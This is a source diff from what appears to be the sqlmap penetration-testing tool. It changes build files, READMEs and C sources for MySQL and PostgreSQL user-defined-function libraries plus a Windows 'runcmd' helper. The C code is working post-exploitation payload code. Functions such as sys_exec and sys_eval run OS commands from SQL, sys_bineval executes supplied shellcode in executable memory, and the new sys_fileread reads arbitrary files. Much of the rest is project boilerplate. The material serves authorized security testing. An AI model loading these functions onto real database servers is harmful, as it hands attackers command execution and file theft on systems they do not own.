-	memcpy(command, VARDATA(argv0), argv0_size);
-	command[argv0_size] = '\0';
-
-	/*
-	Only if you want to log
-	elog(NOTICE, "Command evaluated: %s", command);
-	*/
-
-	result = (char *)malloc(1);
-	outlen = 0;
-
-	pipe = popen(command, "r");
-
-	while (fgets(line, sizeof(line), pipe) != NULL) {
-		linelen = strlen(line);
-		result = (char *)realloc(result, outlen + linelen);
-		strncpy(result + outlen, line, linelen);
-		outlen = outlen + linelen;
-	}
-
-	pclose(pipe);
-
-	if (*result) {
-		result[outlen-1] = 0x00;
-	}
-
-	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
-	//SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
-	memcpy(VARDATA(result_text), result, strlen(result));
-
-	PG_RETURN_POINTER(result_text);
-}
-
-PG_FUNCTION_INFO_V1(sys_bineval);
-extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
-	text *argv0 = PG_GETARG_TEXT_P(0);
-	int32 argv0_size;
-	size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	int pID;
-	char *code;
-#else
-	int *addr;
-	size_t page_size;
-	pid_t pID;
-#endif
-
-	argv0_size = VARSIZE(argv0) - VARHDRSZ;
-	len = (size_t)argv0_size;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-	// allocate a +rwx memory page
-	code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-	strncpy(code, VARDATA(argv0), len);
-
-	WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
-	pID = fork();
-	if(pID<0)
-		PG_RETURN_INT32(1);
-
-	if(pID==0)
-	{
-		page_size = (size_t)sysconf(_SC_PAGESIZE)-1;	// get page size
-		page_size = (len+page_size) & ~(page_size);		// align to page boundary
-
-		// mmap an rwx memory page
-		addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANONYMOUS, 0, 0);
-
-		if (addr == MAP_FAILED)
-			PG_RETURN_INT32(1);
-
-		strncpy((char *)addr, VARDATA(argv0), len);
-
-		((void (*)(void))addr)();
-	}
-
-	if(pID>0)
-		waitpid(pID, 0, WNOHANG);
-#endif
-
-	PG_RETURN_INT32(0);
-}
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
-	__try
-	{
-		__asm
-		{
-			mov eax, [lpParameter]
-			call eax
-		}
-	}
-	__except(EXCEPTION_EXECUTE_HANDLER)
-	{
-
-	}
-
-	return 0;
-}
-#endif

extra/runcmd/README.txt

@@ -0,0 +1,7 @@
+Files in this folder can be used to compile auxiliary program that can
+be used for running command prompt commands skipping standard "cmd /c" way. 
+They are licensed under the terms of the GNU Lesser General Public License 
+and it's compiled version is available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_

extra/runcmd/windows/README.txt

@@ -0,0 +1,4 @@
+Compile only the Release version because the Runtime library option
+(Project Properties -> Configuration Properties -> C/C++ -> Code
+Generation) is set to "Multi-threaded (/MT)", which statically links
+everything into executable and doesn't compile Debug version at all.

extra/runcmd/windows/runcmd.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual Studio 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "runcmd", "runcmd\runcmd.vcproj", "{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.ActiveCfg = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Debug|Win32.Build.0 = Debug|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.ActiveCfg = Release|Win32
+		{1C6185A9-871A-4F6E-9B2D-BE4399479784}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

extra/runcmd/windows/runcmd/runcmd.cpp

@@ -1,8 +1,7 @@
 /* 
-	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
-	web: http://bernardodamele.blogspot.com/
-	email: bernardo.damele@gmail.com
+	runcmd - a program for running command prompt commands
+	Copyright (C) 2010 Miroslav Stampar
+	email: miroslav.stampar@gmail.com
 	
 	This library is free software; you can redistribute it and/or
 	modify it under the terms of the GNU Lesser General Public
@@ -19,6 +18,29 @@
 	Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 */
 
-CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS 'lib_postgresqludf_sys.dll', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
-CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS 'lib_postgresqludf_sys.dll', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+#include <stdio.h>
+#include <windows.h>
+#include <use_ansi.h>
+#include "stdafx.h"
+#include <string>
+
+using namespace std;
+int main(int argc, char* argv[])
+{
+  FILE *fp;
+  string cmd;
+
+  for( int count = 1; count < argc; count++ )
+	cmd += " " + string(argv[count]);
+
+  fp = _popen(cmd.c_str(), "r");
+
+  if (fp != NULL) {
+    char buffer[BUFSIZ];
+
+    while (fgets(buffer, sizeof buffer, fp) != NULL)
+      fputs(buffer, stdout);
+  }
+
+  return 0;
+}

extra/runcmd/windows/runcmd/runcmd.vcproj

@@ -0,0 +1,225 @@
+<?xml version="1.0" encoding="windows-1250"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="runcmd"
+	ProjectGUID="{1C6185A9-871A-4F6E-9B2D-BE4399479784}"
+	RootNamespace="runcmd"
+	Keyword="Win32Proj"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="2"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="1"
+			CharacterSet="1"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
+				RuntimeLibrary="0"
+				UsePrecompiledHeader="2"
+				WarningLevel="3"
+				Detect64BitPortabilityProblems="true"
+				DebugInformationFormat="3"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				LinkIncremental="1"
+				GenerateDebugInformation="true"
+				SubSystem="1"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCWebDeploymentTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+	</Configurations>
+	<References>
+	</References>
+	<Files>
+		<Filter
+			Name="Source Files"
+			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
+			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
+			>
+			<File
+				RelativePath=".\runcmd.cpp"
+				>
+			</File>
+			<File
+				RelativePath=".\stdafx.cpp"
+				>
+				<FileConfiguration
+					Name="Debug|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+				<FileConfiguration
+					Name="Release|Win32"
+					>
+					<Tool
+						Name="VCCLCompilerTool"
+						UsePrecompiledHeader="1"
+					/>
+				</FileConfiguration>
+			</File>
+		</Filter>
+		<Filter
+			Name="Header Files"
+			Filter="h;hpp;hxx;hm;inl;inc;xsd"
+			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
+			>
+			<File
+				RelativePath=".\stdafx.h"
+				>
+			</File>
+		</Filter>
+		<Filter
+			Name="Resource Files"
+			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
+			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
+			>
+		</Filter>
+		<File
+			RelativePath=".\ReadMe.txt"
+			>
+		</File>
+	</Files>
+	<Globals>
+	</Globals>
+</VisualStudioProject>

extra/runcmd/windows/runcmd/stdafx.cpp

@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// runcmd.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file

extra/runcmd/windows/runcmd/stdafx.h

@@ -0,0 +1,17 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#ifndef _WIN32_WINNT		// Allow use of features specific to Windows XP or later.                   
+#define _WIN32_WINNT 0x0501	// Change this to the appropriate value to target other versions of Windows.
+#endif						
+
+#include <stdio.h>
+#include <tchar.h>
+
+
+
+// TODO: reference additional headers your program requires here

extra/udfhack/README.txt

@@ -0,0 +1,7 @@
+Files in this folder can be used to compile shared objects that define
+some user-defined functions for MySQL and PostgreSQL. They are licensed
+under the terms of the GNU Lesser General Public License and their
+compiled versions are available on the official sqlmap subversion
+repository[1].
+
+[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/udf/

extra/udfhack/linux/README.txt

@@ -0,0 +1,22 @@
+Before compiling, you need to adapt the following to your environment:
+
+Variables in install.sh script:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+USER                    Database management system administrative username
+PORT                    Database management system port
+VERSION                 Database management system version (PostgreSQL only)
+
+Variable in Makefile (MySQL only):
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+LIBDIR                  Database management system absolute file system
+                        path for third party libraries
+
+Then you can launch './install.sh' if you want to compile the shared
+object from the source code and create the user-defined functions on the
+database management system.
+If you only want to compile the shared object, you need to call only the
+'make' command.

extra/udfhack/linux/lib_mysqludf_sys/Makefile

@@ -0,0 +1,9 @@
+# For MySQL < 5.1
+LIBDIR=/usr/lib
+# For MySQL >= 5.1
+#LIBDIR=/usr/lib/mysql/plugin
+
+install:
+	gcc -Wall -I/usr/include/mysql -Os -shared lib_mysqludf_sys.c -o lib_mysqludf_sys.so
+	strip -sx lib_mysqludf_sys.so
+	cp -f lib_mysqludf_sys.so $(LIBDIR)/lib_mysqludf_sys.so

extra/udfhack/linux/lib_mysqludf_sys/install.sh

@@ -1,7 +1,7 @@
 #!/bin/bash
 # lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 # Copyright (C) 2007  Roland Bouman 
-# Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+# Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 # web: http://www.mysqludf.org/
 # email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 # 
@@ -20,8 +20,8 @@
 # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 
 # Adapt the following settings to your environment
-PORT="3306"
 USER="root"
+PORT="3306"
 
 echo "Compiling the MySQL UDF"
 make
@@ -29,7 +29,7 @@ make
 if test $? -ne 0; then
 	echo "ERROR: You need libmysqlclient development software installed"
 	echo "to be able to compile this UDF, on Debian/Ubuntu just run:"
-	echo "apt-get install libmysqlclient15-dev"
+	echo "apt-get install libmysqlclient-dev"
 	exit 1
 else
 	echo "MySQL UDF compiled successfully"

extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,7 +1,7 @@
 /* 
 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 	web: http://www.mysqludf.org/
 	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 	

extra/udfhack/linux/lib_mysqludf_sys/lib_mysqludf_sys.sql

@@ -1,7 +1,7 @@
 /*
         lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
         Copyright (C) 2007  Roland Bouman
-        Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+        Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
         web: http://www.mysqludf.org/
         email: roland.bouman@gmail.com, bernardo.damele@gmail.com
 

extra/udfhack/linux/lib_postgresqludf_sys/Makefile

@@ -0,0 +1,16 @@
+LIBDIR=/tmp
+
+8.4:
+	gcc -Wall -I/usr/include/postgresql/8.4/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.3:
+	gcc -Wall -I/usr/include/postgresql/8.3/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so
+
+8.2:
+	gcc -Wall -I/usr/include/postgresql/8.2/server -Os -shared lib_postgresqludf_sys.c -o lib_postgresqludf_sys.so
+	strip -sx lib_postgresqludf_sys.so
+	cp -f lib_postgresqludf_sys.so $(LIBDIR)/lib_postgresqludf_sys.so

extra/udfhack/linux/lib_postgresqludf_sys/install.sh

@@ -1,6 +1,6 @@
 #!/bin/bash
 # lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-# Copyright (C) 2009  Bernardo Damele A. G.
+# Copyright (C) 2009-2010  Bernardo Damele A. G.
 # web: http://bernardodamele.blogspot.com/
 # email: bernardo.damele@gmail.com
 # 
@@ -19,11 +19,13 @@
 # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
 
 # Adapt the following settings to your environment
-#PORT="5433"
-#VERSION="8.2"
-PORT="5432"
-VERSION="8.3"
 USER="postgres"
+PORT="5434"
+VERSION="8.4"
+#PORT="5433"
+#VERSION="8.3"
+#PORT="5432"
+#VERSION="8.2"
 
 echo "Compiling the PostgreSQL UDF"
 make ${VERSION}
@@ -34,8 +36,10 @@ if test $? -ne 0; then
 
 	if test "${VERSION}" == "8.2"; then
 		echo "apt-get install postgresql-server-dev-8.2"
-	else
+	elif test "${VERSION}" == "8.3"; then
 		echo "apt-get install postgresql-server-dev-8.3"
+	elif test "${VERSION}" == "8.4"; then
+		echo "apt-get install postgresql-server-dev-8.4"
 	fi
 
 	exit 1

extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.c

@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -47,7 +47,11 @@ PG_MODULE_MAGIC;
 #endif
 
 PG_FUNCTION_INFO_V1(sys_exec);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	int32 result = 0;
@@ -72,7 +76,11 @@ extern PGDLLIMPORT Datum sys_exec(PG_FUNCTION_ARGS) {
 }
 
 PG_FUNCTION_INFO_V1(sys_eval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	text *result_text;
 	int32 argv0_size;
@@ -112,15 +120,22 @@ extern PGDLLIMPORT Datum sys_eval(PG_FUNCTION_ARGS) {
 	}
 
 	result_text = (text *)malloc(VARHDRSZ + strlen(result));
-	//VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#ifdef SET_VARSIZE
 	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
 	memcpy(VARDATA(result_text), result, strlen(result));
 
 	PG_RETURN_POINTER(result_text);
 }
 
 PG_FUNCTION_INFO_V1(sys_bineval);
+#ifdef PGDLLIMPORT
 extern PGDLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_bineval(PG_FUNCTION_ARGS) {
+#endif
 	text *argv0 = PG_GETARG_TEXT_P(0);
 	int32 argv0_size;
 	size_t len;
@@ -190,3 +205,70 @@ DWORD WINAPI exec_payload(LPVOID lpParameter)
 	return 0;
 }
 #endif
+
+#undef fopen
+
+PG_FUNCTION_INFO_V1(sys_fileread);
+#ifdef PGDLLIMPORT
+extern PGDLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#else
+extern DLLIMPORT Datum sys_fileread(PG_FUNCTION_ARGS) {
+#endif
+	text *argv0 = PG_GETARG_TEXT_P(0);
+	text *result_text;
+	int32 argv0_size;
+	int32 len;
+	int32 i, j;
+	char *filename;
+	char *result;
+	char *buffer;
+	char table[] = "0123456789ABCDEF";
+	FILE *file;
+
+	argv0_size = VARSIZE(argv0) - VARHDRSZ;
+	filename = (char *)malloc(argv0_size + 1);
+
+	memcpy(filename, VARDATA(argv0), argv0_size);
+	filename[argv0_size] = '\0';
+	
+	file = fopen(filename, "rb");
+	if (!file)
+	{
+		PG_RETURN_NULL();
+	}
+	fseek(file, 0, SEEK_END);
+	len = ftell(file);
+	fseek(file, 0, SEEK_SET);
+
+	buffer=(char *)malloc(len + 1);
+	if (!buffer)
+	{
+		fclose(file);
+		PG_RETURN_NULL();
+	}
+
+	fread(buffer, len, 1, file);
+	fclose(file);
+
+	result = (char *)malloc(2*len + 1);
+	for (i=0, j=0; i<len; i++)
+	{
+		result[j++] = table[(buffer[i] >> 4) & 0x0f];
+		result[j++] = table[ buffer[i]	   & 0x0f];
+	}
+	result[j] = '\0';
+	
+	result_text = (text *)malloc(VARHDRSZ + strlen(result));
+#ifdef SET_VARSIZE
+	SET_VARSIZE(result_text, VARHDRSZ + strlen(result));
+#else
+	VARATT_SIZEP(result_text) = strlen(result) + VARHDRSZ;
+#endif
+	memcpy(VARDATA(result_text), result, strlen(result));
+	
+	free(result);
+	free(buffer);
+	free(filename);
+
+	PG_RETURN_POINTER(result_text);
+}

extra/udfhack/linux/lib_postgresqludf_sys/lib_postgresqludf_sys.sql

@@ -1,6 +1,6 @@
 /* 
 	lib_postgresqludf_sys - a library with miscellaneous (operating) system level functions
-	Copyright (C) 2009  Bernardo Damele A. G.
+	Copyright (C) 2009-2010  Bernardo Damele A. G.
 	web: http://bernardodamele.blogspot.com/
 	email: bernardo.damele@gmail.com
 	
@@ -22,3 +22,4 @@
 CREATE OR REPLACE FUNCTION sys_exec(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_exec' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
 CREATE OR REPLACE FUNCTION sys_eval(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_eval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
 CREATE OR REPLACE FUNCTION sys_bineval(text) RETURNS int4 AS '/tmp/lib_postgresqludf_sys.so', 'sys_bineval' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;
+CREATE OR REPLACE FUNCTION sys_fileread(text) RETURNS text AS '/tmp/lib_postgresqludf_sys.so', 'sys_fileread' LANGUAGE C RETURNS NULL ON NULL INPUT IMMUTABLE;

extra/udfhack/windows/README.txt

@@ -0,0 +1,25 @@
+Before compiling, certain enviroment variables have to be set,
+depending on the project used. For project lib_mysqludf_sys variables
+PLATFORM_SDK_DIR and MYSQL_SERVER_DIR have to be set, while for project
+lib_postgresqludf_sys variables PLATFORM_SDK_DIR and
+POSTGRESQL_SERVER_DIR.
+
+Variables:
+--------------------------------------------------------------------------
+Variable name			Variable description
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		Directory where the Platform SDK is installed
+MYSQL_SERVER_DIR		Directory where the MySQL is installed
+POSTGRESQL_SERVER_DIR	Directory where the PostgreSQL is installed
+
+Procedure for setting environment variables:
+My Computer -> Properties -> Advanced -> Environment Variables
+User variables -> New
+
+Sample values:
+--------------------------------------------------------------------------
+Variable name			Variable value
+--------------------------------------------------------------------------
+PLATFORM_SDK_DIR		C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
+MYSQL_SERVER_DIR		C:\Program Files\MySQL\MySQL Server 5.1
+POSTGRESQL_SERVER_DIR	C:\Program Files\PostgreSQL\8.4

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys.sln

@@ -0,0 +1,20 @@
+
+Microsoft Visual Studio Solution File, Format Version 9.00
+# Visual C++ Express 2005
+Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "lib_mysqludf_sys", "lib_mysqludf_sys\lib_mysqludf_sys.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
+EndProject
+Global
+	GlobalSection(SolutionConfigurationPlatforms) = preSolution
+		Debug|Win32 = Debug|Win32
+		Release|Win32 = Release|Win32
+	EndGlobalSection
+	GlobalSection(ProjectConfigurationPlatforms) = postSolution
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
+		{4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
+	EndGlobalSection
+	GlobalSection(SolutionProperties) = preSolution
+		HideSolutionNode = FALSE
+	EndGlobalSection
+EndGlobal

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.c

@@ -1,7 +1,7 @@
 /* 
 	lib_mysqludf_sys - a library with miscellaneous (operating) system level functions
 	Copyright (C) 2007  Roland Bouman 
-	Copyright (C) 2008-2009  Roland Bouman and Bernardo Damele A. G.
+	Copyright (C) 2008-2010  Roland Bouman and Bernardo Damele A. G.
 	web: http://www.mysqludf.org/
 	email: mysqludfs@gmail.com, bernardo.damele@gmail.com
 	

extra/udfhack/windows/lib_mysqludf_sys/lib_mysqludf_sys/lib_mysqludf_sys.vcproj

@@ -0,0 +1,192 @@
+<?xml version="1.0" encoding="Windows-1252"?>
+<VisualStudioProject
+	ProjectType="Visual C++"
+	Version="8,00"
+	Name="lib_mysqludf_sys"
+	ProjectGUID="{4D362A3E-CA53-444C-B1C8-C49641823875}"
+	RootNamespace="lib_mysqludf_sys"
+	TargetFrameworkVersion="196613"
+	>
+	<Platforms>
+		<Platform
+			Name="Win32"
+		/>
+	</Platforms>
+	<ToolFiles>
+	</ToolFiles>
+	<Configurations>
+		<Configuration
+			Name="Debug|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="0"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				MinimalRebuild="true"
+				BasicRuntimeChecks="3"
+				RuntimeLibrary="3"
+				WarningLevel="3"
+				DebugInformationFormat="4"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)"
+				GenerateDebugInformation="true"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
+			/>
+			<Tool
+				Name="VCFxCopTool"
+			/>
+			<Tool
+				Name="VCAppVerifierTool"
+			/>
+			<Tool
+				Name="VCPostBuildEventTool"
+			/>
+		</Configuration>
+		<Configuration
+			Name="Release|Win32"
+			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
+			IntermediateDirectory="$(ConfigurationName)"
+			ConfigurationType="2"
+			CharacterSet="2"
+			WholeProgramOptimization="1"
+			>
+			<Tool
+				Name="VCPreBuildEventTool"
+			/>
+			<Tool
+				Name="VCCustomBuildTool"
+			/>
+			<Tool
+				Name="VCXMLDataGeneratorTool"
+			/>
+			<Tool
+				Name="VCWebServiceProxyGeneratorTool"
+			/>
+			<Tool
+				Name="VCMIDLTool"
+			/>
+			<Tool
+				Name="VCCLCompilerTool"
+				Optimization="1"
+				EnableIntrinsicFunctions="true"
+				FavorSizeOrSpeed="2"
+				AdditionalIncludeDirectories="$(PLATFORM_SDK_DIR)\include;$(MYSQL_SERVER_DIR)\include"
+				PreprocessorDefinitions="HAVE_DLOPEN"
+				RuntimeLibrary="2"
+				EnableFunctionLevelLinking="true"
+				WarningLevel="3"
+				DebugInformationFormat="0"
+			/>
+			<Tool
+				Name="VCManagedResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCResourceCompilerTool"
+			/>
+			<Tool
+				Name="VCPreLinkEventTool"
+			/>
+			<Tool
+				Name="VCLinkerTool"
+				AdditionalLibraryDirectories="$(PLATFORM_SDK_DIR)\Lib"
+				GenerateDebugInformation="false"
+				OptimizeReferences="2"
+				EnableCOMDATFolding="2"
+				OptimizeForWindows98="1"
+				TargetMachine="1"
+			/>
+			<Tool
+				Name="VCALinkTool"
+			/>
+			<Tool
+				Name="VCManifestTool"
+			/>
+			<Tool
+				Name="VCXDCMakeTool"
+			/>
+			<Tool
+				Name="VCBscMakeTool"
